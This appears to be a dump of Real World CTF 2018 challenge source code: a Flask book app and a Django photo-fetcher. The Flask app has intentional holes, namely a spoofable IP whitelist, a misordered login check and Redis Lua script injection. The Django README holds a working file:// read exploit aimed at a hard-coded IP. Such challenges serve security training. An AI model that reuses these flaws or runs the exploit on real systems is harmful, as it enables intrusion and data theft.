FlaskForm 4 | from flask_login import current_user 5 | from wtforms import StringField, PasswordField, BooleanField 6 | from wtforms.validators import DataRequired, StopValidation, Length 7 | 8 | from bookhub import app 9 | from bookhub.models import User 10 | from bookhub.helper import ip_address_in, get_remote_addr 11 | 12 | 13 | class LoginForm(FlaskForm): 14 | username = StringField('username', validators=[DataRequired()]) 15 | password = PasswordField('password', validators=[DataRequired()]) 16 | remember_me = BooleanField('remember_me', default=False) 17 | 18 | def validate_password(self, field): 19 | address = get_remote_addr() 20 | whitelist = os.environ.get('WHITELIST_IPADDRESS', '127.0.0.1') 21 | 22 | # If you are in the debug mode or from office network (developer) 23 | if not app.debug and not ip_address_in(address, whitelist): 24 | raise StopValidation(f'your ip address isn\'t in the {whitelist}.') 25 | 26 | user = User.query.filter_by(username=self.username.data).first() 27 | if not user or not user.check_password(field.data): 28 | raise StopValidation('Username or password error.') 29 | 30 | 31 | class UserForm(FlaskForm): 32 | username = StringField('username', validators=[DataRequired(), Length(1, 64)]) 33 | 34 | def validate_username(self, field): 35 | if field.data != current_user.username and User.query.filter_by(username=field.data).first(): 36 | raise StopValidation('Username is exists.') 37 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/helper.py: -------------------------------------------------------------------------------- 1 | import flask 2 | import os 3 | import ipaddress 4 | 5 | 6 | def ip_address_in(ip, ip_range): 7 | try: 8 | for item in ip_range.split(','): 9 | if ipaddress.ip_address(ip) in ipaddress.ip_network(item): 10 | return True 11 | except Exception as e: 12 | pass 13 | 14 | return False 15 | 16 | 17 | def get_remote_addr(): 18 | address = flask.request.headers.get('X-Forwarded-For', flask.request.remote_addr) 19 | 20 | try: 21 | ipaddress.ip_address(address) 22 | except ValueError: 23 | return None 24 | else: 25 | return address 26 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/models/__init__.py: -------------------------------------------------------------------------------- 1 | import flask 2 | from bookhub import login_manager, migrate 3 | from .user import User 4 | from .book import Book 5 | 6 | 7 | __all__ = ['User', 'Book'] 8 | 9 | 10 | @login_manager.user_loader 11 | def load_user(user_id): 12 | return User.query.filter_by(id=user_id).first() 13 | 14 | 15 | @login_manager.unauthorized_handler 16 | def unauthorized_handler(): 17 | return flask.redirect(flask.url_for('user.login'), code=303) 18 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/models/book.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | from bookhub import db 3 | 4 | 5 | class Book(db.Model): 6 | id = db.Column(db.Integer, primary_key=True) 7 | title = db.Column(db.String(256), nullable=False) 8 | img = db.Column(db.String(256)) 9 | description = db.Column(db.Text) 10 | 11 | created_at = db.Column(db.DateTime, default=datetime.datetime.now) 12 | 13 | def __repr__(self): 14 | return '' % self.title 15 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/models/user.py: -------------------------------------------------------------------------------- 1 | import os 2 | import flask 3 | from bookhub import db 4 | from werkzeug.security import generate_password_hash, check_password_hash 5 | from bookhub.helper import ip_address_in 6 | 7 | 8 | class User(db.Model): 9 | id = db.Column(db.Integer, primary_key=True) 10 | username = db.Column(db.String(64), unique=True, nullable=False) 11 | password = db.Column(db.String(128)) 12 | 13 | def __repr__(self): 14 | return '' % self.username 15 | 16 | def set_password(self, password): 17 | self.password = generate_password_hash(password) 18 | db.session.commit() 19 | 20 | def check_password(self, password): 21 | return check_password_hash(self.password, password) 22 | 23 | def get_id(self): 24 | return str(self.id) 25 | 26 | @property 27 | def is_active(self): 28 | return True 29 | 30 | @property 31 | def is_anonymous(self): 32 | return False 33 | 34 | @property 35 | def is_authenticated(self): 36 | return True 37 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/static/css/login.css: -------------------------------------------------------------------------------- 1 | #login-box { 2 | max-width:500px; 3 | margin:0 auto; 4 | margin-top:25px !important; 5 | border-radius:12px; 6 | overflow:hidden; 7 | background:white; 8 | -webkit-box-shadow:0px 6px 30px rgba(0,0,0,0.2); 9 | -moz-box-shadow:0px 6px 30px rgba(0,0,0,0.2); 10 | box-shadow:0px 6px 30px rgba(0,0,0,0.2); 11 | } 12 | 13 | .login-box-header { 14 | background-color:rgb(255,255,255); 15 | text-align:center; 16 | padding-top:18px; 17 | padding-right:25px; 18 | padding-bottom:15px; 19 | padding-left:25px; 20 | } 21 | 22 | .login-box-header { 23 | border:none; 24 | border-bottom:1px solid rgb(224,224,224); 25 | } 26 | 27 | .login-box-header > h4 { 28 | color:rgb(139,139,139); 29 | margin-bottom:0px; 30 | font-weight:400; 31 | font-size:27px; 32 | } 33 | 34 | .login-box-content { 35 | padding:10px 20px; 36 | background-color:#ffffff; 37 | padding-top:20px; 38 | } 39 | 40 | .social-login-link { 41 | text-decoration:none; 42 | color:white; 43 | margin-top:10px; 44 | } 45 | 46 | .fb-login { 47 | background-color:#1a538a; 48 | } 49 | 50 | .gp-login { 51 | background-color:#db4437; 52 | margin-top:10px; 53 | } 54 | 55 | .login-box-content i { 56 | padding:11px 0px 11px 15px; 57 | color:white; 58 | padding-right:20px; 59 | padding-left:20px; 60 | font-size:18px; 61 | } 62 | 63 | .box-shadow { 64 | box-shadow:0 2px 2px 0 rgba(41,48,59,.24), 0 0 2px 0 rgba(41,48,59,.12); 65 | border-radius:5px; 66 | } 67 | 68 | .social-login-link:hover { 69 | text-decoration:none; 70 | color:white; 71 | } 72 | 73 | .login-box-seperator { 74 | flex:1 0 auto; 75 | min-width:1px; 76 | border-top:1px solid #dedfe0; 77 | height:1px; 78 | } 79 | 80 | .name-input { 81 | border-radius:5px; 82 | color:#29303b; 83 | font-size:18px; 84 | height:auto; 85 | padding:11px 10px 12px 40px; 86 | margin-top:10px; 87 | } 88 | 89 | .form-control { 90 | box-shadow:none; 91 | font-size:16px; 92 | padding:10px 12px; 93 | transition:border-color .08s ease-in-out,box-shadow .08s ease-in-out; 94 | } 95 | 96 | .name-login { 97 | padding:10px 20px; 98 | background-color:#ffffff; 99 | } 100 | 101 | #submit-id-submit { 102 | margin-top:0px; 103 | height:46px; 104 | background-color:rgb(26,138,111); 105 | border:0; 106 | color:rgb(255,255,255); 107 | margin-bottom:8px; 108 | padding-top:0px; 109 | padding-bottom:0px; 110 | } 111 | 112 | .submit-row { 113 | padding:10px 20px; 114 | text-align:center; 115 | margin-bottom:8px; 116 | padding-top:0px; 117 | } 118 | 119 | .label-text { 120 | color:#8b8b8b; 121 | } 122 | 123 | #forgot-password-link { 124 | color:#2474c1; 125 | text-decoration:none; 126 | } 127 | 128 | #login-box-footer { 129 | text-align:center; 130 | border-top:1px solid #dedfe0; 131 | padding: 18px 10px 23px 10px; 132 | } 133 | 134 | #register-link { 135 | color:#2474c1; 136 | padding:0px 10px; 137 | text-decoration:none; 138 | } 139 | 140 | #login-box-footer p { 141 | color:#8b8b8b; 142 | margin-bottom:0px; 143 | } 144 | 145 | #submit-id-submit:hover { 146 | background-color:rgb(25,130,105); 147 | } 148 | 149 | .password-input { 150 | margin-top:10px; 151 | } 152 | 153 | #formCheck-1 { 154 | cursor:pointer; 155 | } 156 | 157 | .alert { 158 | word-wrap: break-word; 159 | } -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/_base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | pwnhub_6672 6 | 7 | {% block addstyle %}{% endblock %} 8 | 9 | 10 | {% block body %}{% endblock %} 11 | {% block addscript %}{% endblock %} 12 | 13 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/_form.html: -------------------------------------------------------------------------------- 1 | {% macro render(form) -%} 2 | 3 | {%- for field in form -%} 4 | {%- if field.type in ['CSRFTokenField', 'HiddenField'] -%} 5 | {{ field() }} 6 | {%- elif field.is_show and not field.is_show() -%} 7 | {%- else -%} 8 |
9 | 10 | {{ field(class_="form-control") }} 11 | {% if field.errors or field.help_text %} 12 | 13 | {% if field.errors %} 14 | {{ field.errors | first }} 15 | {% else %} 16 | {{ field.help_text }} 17 | {% endif %} 18 | 19 | {%- endif -%} 20 |
21 | {%- endif -%} 22 | {%- endfor -%} 23 | {% endmacro %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/_pagination.html: -------------------------------------------------------------------------------- 1 | {% macro render(pagenav) -%} 2 | 3 | {% if pagenav.total > 0 %} 4 |
    5 | 6 | {%- for page in pagenav.iter_pages() -%} 7 | {% if page %} 8 | {% if page != pagenav.page -%} 9 |
  • {{ page }}
  • 10 | {%- else -%} 11 |
  • {{ page }}
  • 12 | {%- endif %} 13 | {% else -%} 14 |
  • 15 | {%- endif %} 16 | {%- endfor -%} 17 | 18 |
19 | {% endif %} 20 | 21 | {%- endmacro %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/add.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import '_form.html' as f %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |

Book Management

9 |
10 |
11 |
12 |
13 |
14 | {{ f.render(form) }} 15 |
16 | 17 | 18 |
19 |
20 |
21 |
22 |
23 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/admin.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import "_pagination.html" as pagation %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |
9 |

Book Management

10 |
11 |
12 |
13 |
14 | 16 |
17 |
18 |
19 | 20 |
21 |
22 |
23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | {% for object in object_list.items %} 35 | 36 | 37 | 38 | 39 | 40 | 41 | {% endfor %} 42 | 43 |
Book coverBook titleBook descriptionEdit
{{ object.title }}{{ object.title }}{{ object.description }}Edit
44 |
45 |
46 |
47 |
48 |
49 | 52 |
53 |
54 |
55 |
56 |
57 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/edit.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import '_form.html' as f %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |

Book Management

9 |
10 |
11 |
12 |
13 |
14 | {{ f.render(form) }} 15 |
16 | 17 | 18 | 19 |
20 |
21 |
22 |
23 |
24 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/error.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block body %} 4 |
5 |
6 |
7 |

Error Page

8 |
9 |
10 |
11 |
12 | 18 |
19 |
20 |
21 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import "_pagination.html" as pagation %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |
9 |

Bookhub

10 |
11 |
12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | {% for object in object_list.items %} 25 | 26 | 27 | 28 | 29 | 30 | {% endfor %} 31 | 32 |
Book coverBook titleBook description
{{ object.title }}{{ object.title }}{{ object.description }}
33 |
34 |
35 |
36 |
37 |
38 | 41 |
42 |
43 |
44 |
45 |
46 | {% endblock %} 47 | 48 | {% block addscript %} 49 | {% if is_debug %} 50 | 51 | 52 | 66 | {% endif %} 67 | 68 | {% endblock %} 69 | 70 | {% block addstyle %} 71 | 72 | {% if is_debug %} 73 | 83 | {% endif %} 84 | 85 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' -%} 2 | 3 | {% block body %} 4 |
5 | 8 |
9 | {{ form.csrf_token }} 10 | 20 |
21 | 22 |
23 |
24 | 25 |
26 |
27 |
28 |
29 | 34 |
35 | {% endblock %} 36 | 37 | {% block addscript %} 38 | 39 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/system.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block body %} 4 |
5 |
6 |
7 |

System Management

8 |
9 |
10 |
11 |
12 | 14 |
15 |
16 |
17 |
18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 |
Your username{{ current_user.username }}
Your IP address{{ ip_address }}
Number of users{{ user_count }}
Number of books{{ book_count }}
39 |
40 |
41 | 42 |
43 | 44 |
45 | 46 |
47 |
48 | 49 | 52 |
53 |
54 |
55 | {% endblock %} 56 | 57 | {% block addscript %} 58 | 59 | 102 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/views/__init__.py: -------------------------------------------------------------------------------- 1 | from .user import user_blueprint 2 | from .book import book_blueprint 3 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/views/book.py: -------------------------------------------------------------------------------- 1 | import flask 2 | from flask_login import login_required, login_user, current_user 3 | from bookhub import app, db 4 | from bookhub.forms import BookForm 5 | from bookhub.models import User, Book 6 | 7 | 8 | book_blueprint = flask.Blueprint('book', __name__, template_folder='templates') 9 | 10 | 11 | @book_blueprint.route('/') 12 | def index(): 13 | try: 14 | page = int(flask.request.args.get('page', 1)) 15 | except ValueError: 16 | page = 1 17 | 18 | object_list = Book.query.order_by(Book.created_at.desc()).paginate(page, per_page=10, error_out=False) 19 | object_list.module_name = 'book.index' 20 | return flask.render_template('index.html', object_list=object_list, is_debug=app.debug) 21 | 22 | 23 | @book_blueprint.route('/admin/') 24 | @login_required 25 | def admin(): 26 | try: 27 | page = int(flask.request.args.get('page', 1)) 28 | except ValueError: 29 | page = 1 30 | 31 | object_list = Book.query.order_by(Book.created_at.desc()).paginate(page, per_page=10, error_out=False) 32 | object_list.module_name = 'book.admin' 33 | return flask.render_template('admin.html', object_list=object_list) 34 | 35 | 36 | @book_blueprint.route('/admin/add/', methods=['GET', 'POST']) 37 | @login_required 38 | def add(): 39 | form = BookForm(data=flask.request.data) 40 | if form.validate_on_submit(): 41 | book = Book() 42 | form.populate_obj(book) 43 | db.session.add(book) 44 | db.session.commit() 45 | return flask.redirect(flask.url_for('book.admin')) 46 | 47 | return flask.render_template('add.html', form=form) 48 | 49 | 50 | @book_blueprint.route('/admin/edit//', methods=['GET', 'POST']) 51 | @login_required 52 | def edit(id): 53 | book = Book.query.filter_by(id=id).first_or_404() 54 | form = BookForm(data=flask.request.data, obj=book) 55 | if form.is_submitted() and flask.request.form.get('delete', None) is not None: 56 | db.session.delete(book) 57 | db.session.commit() 58 | return flask.redirect(flask.url_for('book.admin')) 59 | elif form.validate_on_submit(): 60 | form.populate_obj(book) 61 | db.session.commit() 62 | return flask.redirect(flask.url_for('book.admin')) 63 | 64 | return flask.render_template('edit.html', form=form) 65 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/views/user.py: -------------------------------------------------------------------------------- 1 | import flask 2 | import redis 3 | from flask_login import login_required, login_user, current_user, logout_user 4 | from bookhub import app, db, rds 5 | from bookhub.forms import LoginForm, UserForm 6 | from bookhub.models import User, Book 7 | from bookhub.helper import get_remote_addr 8 | 9 | 10 | user_blueprint = flask.Blueprint('user', __name__, template_folder='templates') 11 | 12 | 13 | @user_blueprint.route('/login/', methods=['GET', 'POST']) 14 | def login(): 15 | form = LoginForm(data=flask.request.data) 16 | if form.validate_on_submit(): 17 | user = User.query.filter_by(username=form.username.data).first() 18 | login_user(user, remember=form.remember_me.data) 19 | 20 | return flask.redirect(flask.url_for('book.admin')) 21 | 22 | return flask.render_template('login.html', form=form) 23 | 24 | 25 | @user_blueprint.route('/admin/logout/') 26 | @login_required 27 | def logout(): 28 | logout_user() 29 | return flask.redirect(flask.url_for('user.login')) 30 | 31 | 32 | if app.debug: 33 | """ 34 | For CTF administrator, only running in debug mode 35 | """ 36 | 37 | @user_blueprint.route('/admin/system/') 38 | @login_required 39 | def system(): 40 | """ 41 | 42 | 43 | :return: 44 | """ 45 | 46 | ip_address = get_remote_addr() 47 | user_count = User.query.count() 48 | book_count = Book.query.count() 49 | 50 | return flask.render_template('system.html', 51 | ip_address=ip_address, 52 | user_count=user_count, 53 | book_count=book_count 54 | ) 55 | 56 | @user_blueprint.route('/admin/system/change_name/', methods=['POST']) 57 | @login_required 58 | def change_name(): 59 | """ 60 | change username 61 | 62 | :return: json 63 | """ 64 | 65 | user = User.query.get(current_user.id) 66 | form = UserForm(obj=user) 67 | if form.validate_on_submit(): 68 | form.populate_obj(user) 69 | 70 | db.session.commit() 71 | return flask.jsonify(dict(status='success')) 72 | else: 73 | return flask.jsonify(dict(status='fail', errors=form.errors)) 74 | 75 | 76 | @login_required 77 | @user_blueprint.route('/admin/system/refresh_session/', methods=['POST']) 78 | def refresh_session(): 79 | """ 80 | delete all session except the logined user 81 | 82 | :return: json 83 | """ 84 | 85 | status = 'success' 86 | sessionid = flask.session.sid 87 | prefix = app.config['SESSION_KEY_PREFIX'] 88 | 89 | if flask.request.form.get('submit', None) == '1': 90 | try: 91 | rds.eval(rf''' 92 | local function has_value (tab, val) 93 | for index, value in ipairs(tab) do 94 | if value == val then 95 | return true 96 | end 97 | end 98 | 99 | return false 100 | end 101 | 102 | local inputs = {{ "{prefix}{sessionid}" }} 103 | local sessions = redis.call("keys", "{prefix}*") 104 | 105 | for index, sid in ipairs(sessions) do 106 | if not has_value(inputs, sid) then 107 | redis.call("del", sid) 108 | end 109 | end 110 | ''', 0) 111 | except redis.exceptions.ResponseError as e: 112 | app.logger.exception(e) 113 | status = 'fail' 114 | 115 | return flask.jsonify(dict(status=status)) 116 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/README: -------------------------------------------------------------------------------- 1 | Generic single-database configuration. -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/alembic.ini: -------------------------------------------------------------------------------- 1 | # A generic, single database configuration. 2 | 3 | [alembic] 4 | # template used to generate migration files 5 | # file_template = %%(rev)s_%%(slug)s 6 | 7 | # set to 'true' to run the environment during 8 | # the 'revision' command, regardless of autogenerate 9 | # revision_environment = false 10 | 11 | 12 | # Logging configuration 13 | [loggers] 14 | keys = root,sqlalchemy,alembic 15 | 16 | [handlers] 17 | keys = console 18 | 19 | [formatters] 20 | keys = generic 21 | 22 | [logger_root] 23 | level = WARN 24 | handlers = console 25 | qualname = 26 | 27 | [logger_sqlalchemy] 28 | level = WARN 29 | handlers = 30 | qualname = sqlalchemy.engine 31 | 32 | [logger_alembic] 33 | level = INFO 34 | handlers = 35 | qualname = alembic 36 | 37 | [handler_console] 38 | class = StreamHandler 39 | args = (sys.stderr,) 40 | level = NOTSET 41 | formatter = generic 42 | 43 | [formatter_generic] 44 | format = %(levelname)-5.5s [%(name)s] %(message)s 45 | datefmt = %H:%M:%S 46 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/env.py: -------------------------------------------------------------------------------- 1 | from __future__ import with_statement 2 | from alembic import context 3 | from sqlalchemy import engine_from_config, pool 4 | from logging.config import fileConfig 5 | import logging 6 | 7 | # this is the Alembic Config object, which provides 8 | # access to the values within the .ini file in use. 9 | config = context.config 10 | 11 | # Interpret the config file for Python logging. 12 | # This line sets up loggers basically. 13 | fileConfig(config.config_file_name) 14 | logger = logging.getLogger('alembic.env') 15 | 16 | # add your model's MetaData object here 17 | # for 'autogenerate' support 18 | # from myapp import mymodel 19 | # target_metadata = mymodel.Base.metadata 20 | from flask import current_app 21 | config.set_main_option('sqlalchemy.url', 22 | current_app.config.get('SQLALCHEMY_DATABASE_URI')) 23 | target_metadata = current_app.extensions['migrate'].db.metadata 24 | 25 | # other values from the config, defined by the needs of env.py, 26 | # can be acquired: 27 | # my_important_option = config.get_main_option("my_important_option") 28 | # ... etc. 29 | 30 | 31 | def run_migrations_offline(): 32 | """Run migrations in 'offline' mode. 33 | 34 | This configures the context with just a URL 35 | and not an Engine, though an Engine is acceptable 36 | here as well. By skipping the Engine creation 37 | we don't even need a DBAPI to be available. 38 | 39 | Calls to context.execute() here emit the given string to the 40 | script output. 41 | 42 | """ 43 | url = config.get_main_option("sqlalchemy.url") 44 | context.configure(url=url) 45 | 46 | with context.begin_transaction(): 47 | context.run_migrations() 48 | 49 | 50 | def run_migrations_online(): 51 | """Run migrations in 'online' mode. 52 | 53 | In this scenario we need to create an Engine 54 | and associate a connection with the context. 55 | 56 | """ 57 | 58 | # this callback is used to prevent an auto-migration from being generated 59 | # when there are no changes to the schema 60 | # reference: http://alembic.zzzcomputing.com/en/latest/cookbook.html 61 | def process_revision_directives(context, revision, directives): 62 | if getattr(config.cmd_opts, 'autogenerate', False): 63 | script = directives[0] 64 | if script.upgrade_ops.is_empty(): 65 | directives[:] = [] 66 | logger.info('No changes in schema detected.') 67 | 68 | engine = engine_from_config(config.get_section(config.config_ini_section), 69 | prefix='sqlalchemy.', 70 | poolclass=pool.NullPool) 71 | 72 | connection = engine.connect() 73 | context.configure(connection=connection, 74 | target_metadata=target_metadata, 75 | process_revision_directives=process_revision_directives, 76 | render_as_batch=True, 77 | **current_app.extensions['migrate'].configure_args) 78 | 79 | try: 80 | with context.begin_transaction(): 81 | context.run_migrations() 82 | finally: 83 | connection.close() 84 | 85 | if context.is_offline_mode(): 86 | run_migrations_offline() 87 | else: 88 | run_migrations_online() 89 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/script.py.mako: -------------------------------------------------------------------------------- 1 | """${message} 2 | 3 | Revision ID: ${up_revision} 4 | Revises: ${down_revision | comma,n} 5 | Create Date: ${create_date} 6 | 7 | """ 8 | from alembic import op 9 | import sqlalchemy as sa 10 | ${imports if imports else ""} 11 | 12 | # revision identifiers, used by Alembic. 13 | revision = ${repr(up_revision)} 14 | down_revision = ${repr(down_revision)} 15 | branch_labels = ${repr(branch_labels)} 16 | depends_on = ${repr(depends_on)} 17 | 18 | 19 | def upgrade(): 20 | ${upgrades if upgrades else "pass"} 21 | 22 | 23 | def downgrade(): 24 | ${downgrades if downgrades else "pass"} 25 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/versions/b6eb51473869_.py: -------------------------------------------------------------------------------- 1 | """empty message 2 | 3 | Revision ID: b6eb51473869 4 | Revises: 5 | Create Date: 2018-07-17 19:05:22.506093 6 | 7 | """ 8 | from alembic import op 9 | import sqlalchemy as sa 10 | 11 | 12 | # revision identifiers, used by Alembic. 13 | revision = 'b6eb51473869' 14 | down_revision = None 15 | branch_labels = None 16 | depends_on = None 17 | 18 | 19 | def upgrade(): 20 | # ### commands auto generated by Alembic - please adjust! ### 21 | op.create_table('user', 22 | sa.Column('id', sa.Integer(), nullable=False), 23 | sa.Column('username', sa.String(length=64), nullable=True), 24 | sa.Column('password', sa.String(length=128), nullable=True), 25 | sa.PrimaryKeyConstraint('id'), 26 | sa.UniqueConstraint('username') 27 | ) 28 | # ### end Alembic commands ### 29 | 30 | 31 | def downgrade(): 32 | # ### commands auto generated by Alembic - please adjust! ### 33 | op.drop_table('user') 34 | # ### end Alembic commands ### 35 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/versions/bd31dc4168e1_.py: -------------------------------------------------------------------------------- 1 | """empty message 2 | 3 | Revision ID: bd31dc4168e1 4 | Revises: b6eb51473869 5 | Create Date: 2018-07-22 19:11:40.172217 6 | 7 | """ 8 | from alembic import op 9 | import sqlalchemy as sa 10 | 11 | 12 | # revision identifiers, used by Alembic. 13 | revision = 'bd31dc4168e1' 14 | down_revision = 'b6eb51473869' 15 | branch_labels = None 16 | depends_on = None 17 | 18 | 19 | data = [ 20 | { 21 | 'title': 'Gone with the Wind', 22 | 'description': "Gone with the Wind is a novel by American writer Margaret Mitchell, first published in 1936. ", 23 | 'img': 'https://wx3.sinaimg.cn/large/400f4ee7ly1ftiyq96oumj205107r41l.jpg' 24 | }, 25 | { 26 | 'title': 'On the road', 27 | 'description': 'On the Road is a novel by American writer Jack Kerouac, based on the travels of' 28 | ' Kerouac and his friends across the United States.', 29 | 'img': 'https://ws1.sinaimg.cn/large/400f4ee7ly1ftiyvcdh1nj206y0arac9.jpg' 30 | }, 31 | { 32 | 'title': 'The Great Gatsby', 33 | 'description': 'The Great Gatsby is a 1925 novel written by American author F. Scott Fitzgerald' 34 | ' that follows a cast of characters living in the fictional town of West and East' 35 | ' Egg on prosperous Long Island in the summer of 1922.', 36 | 'img': 'https://ws4.sinaimg.cn/large/400f4ee7ly1ftiz2xuq7fj20940dv10z.jpg' 37 | } 38 | ] 39 | 40 | 41 | def upgrade(): 42 | # ### commands auto generated by Alembic - please adjust! ### 43 | book_table = op.create_table('book', 44 | sa.Column('id', sa.Integer(), nullable=False), 45 | sa.Column('title', sa.String(length=256), nullable=False), 46 | sa.Column('img', sa.String(length=256), nullable=True), 47 | sa.Column('description', sa.Text(), nullable=True), 48 | sa.Column('created_at', sa.DateTime(), nullable=True), 49 | sa.PrimaryKeyConstraint('id') 50 | ) 51 | with op.batch_alter_table('user', schema=None) as batch_op: 52 | batch_op.alter_column('username', 53 | existing_type=sa.VARCHAR(length=64), 54 | nullable=False) 55 | 56 | op.bulk_insert(book_table, data) 57 | 58 | # ### end Alembic commands ### 59 | 60 | 61 | def downgrade(): 62 | # ### commands auto generated by Alembic - please adjust! ### 63 | with op.batch_alter_table('user', schema=None) as batch_op: 64 | batch_op.alter_column('username', 65 | existing_type=sa.VARCHAR(length=64), 66 | nullable=True) 67 | 68 | op.drop_table('book') 69 | # ### end Alembic commands ### 70 | -------------------------------------------------------------------------------- /2018/bookhub/src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | flask-sqlalchemy 3 | flask-migrate 4 | flask-wtf 5 | python-dotenv 6 | flask-login 7 | flask-session 8 | redis 9 | gunicorn 10 | gevent -------------------------------------------------------------------------------- /2018/magic_tunnel/.dockerignore: -------------------------------------------------------------------------------- 1 | code/rwctf/media/ 2 | code/rwctf/db.sqlite3 3 | code/.idea/ -------------------------------------------------------------------------------- /2018/magic_tunnel/.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | __pycache__ 3 | /.idea/ 4 | db.sqlite3 -------------------------------------------------------------------------------- /2018/magic_tunnel/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7-alpine 2 | 3 | LABEL maintainer="phith0n " 4 | 5 | ADD requirements.txt /tmp/requirements.txt 6 | ADD flag/readflag.c /tmp/readflag.c 7 | ENV PYCURL_SSL_LIBRARY=openssl 8 | 9 | RUN set -ex \ 10 | # && sed -i 's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories \ 11 | && apk add --no-cache libcurl postgresql-dev 12 | 13 | RUN set -ex \ 14 | && apk add --no-cache --virtual .build-deps build-base curl-dev linux-headers \ 15 | # && pip install -i https://mirrors.aliyun.com/pypi/simple -r /tmp/requirements.txt \ 16 | && pip install -r /tmp/requirements.txt \ 17 | && gcc /tmp/readflag.c -o /readflag \ 18 | && apk del --no-cache --purge .build-deps \ 19 | && rm -rf /var/cache/apk/* /tmp/* 20 | 21 | COPY ./code/ /usr/src/ 22 | WORKDIR /usr/src/rwctf 23 | 24 | COPY flag/flag /flag 25 | RUN set -ex \ 26 | && chown root:root -R . \ 27 | && chown root:root /flag \ 28 | && chmod 0600 /flag \ 29 | && chmod u+s /readflag 30 | 31 | CMD ["sh", "server.sh"] 32 | -------------------------------------------------------------------------------- /2018/magic_tunnel/README.md: -------------------------------------------------------------------------------- 1 | # Real World CTF 2018 Quals - Magic Tunnel 2 | 3 | This is my second challenge for the Real World CTF 2018. 4 | 5 | Read arbitrary files: 6 | 7 | ```python 8 | import re 9 | import requests 10 | 11 | 12 | s = requests.session() 13 | 14 | response = s.post('http://117.51.155.71:8080/', data={ 15 | 'url': 'file:///usr/src/rwctf/manage.py', 16 | 'csrfmiddlewaretoken': 'HrBo1jyAca5ICUYez55WYYB11f34QeBRwOi4mQb2MHBLtqHFfyjSXgE3qzLnxkLR' 17 | }, cookies={'csrftoken': 'HrBo1jyAca5ICUYez55WYYB11f34QeBRwOi4mQb2MHBLtqHFfyjSXgE3qzLnxkLR'}, allow_redirects=True) 18 | 19 | # print(response.text) 20 | 21 | 22 | g = re.search(' 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Your Online Photo Album 12 | 13 | 14 | 15 |
16 |
17 |
18 |

Your Online Photo Album

19 |
20 |
21 | 22 |
23 |
24 |
25 |
26 | 27 |
28 | 29 |
30 | {% csrf_token %} 31 |
32 |
33 |
34 |
35 | 36 |
37 | {% for img in imgs %} 38 |
39 | 40 |
41 | {% endfor %} 42 |
43 |
44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /2018/magic_tunnel/code/rwctf/xremote/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /2018/magic_tunnel/code/rwctf/xremote/urls.py: -------------------------------------------------------------------------------- 1 | from django.urls import path 2 | from django.conf import settings 3 | from django.contrib.staticfiles.views import static 4 | 5 | from . import views 6 | 7 | 8 | app_name = 'xremote' 9 | urlpatterns = [ 10 | path('', views.DownloadRemote.as_view(), name='download') 11 | ] 12 | 13 | if settings.DEBUG: 14 | urlpatterns += [ 15 | path('media/', static.serve, kwargs={'document_root': settings.MEDIA_ROOT}) 16 | ] 17 | -------------------------------------------------------------------------------- /2018/magic_tunnel/code/rwctf/xremote/views.py: -------------------------------------------------------------------------------- 1 | import os 2 | import pycurl 3 | import uuid 4 | 5 | from django.utils import dateformat, timezone 6 | from django.shortcuts import render 7 | from django.views import generic 8 | from django.db import transaction 9 | from django.urls import reverse_lazy 10 | from django.conf import settings 11 | from django.http import HttpResponseRedirect 12 | 13 | from . import forms 14 | from . import models 15 | 16 | 17 | class ImgsMixin(object): 18 | def get_context_data(self, 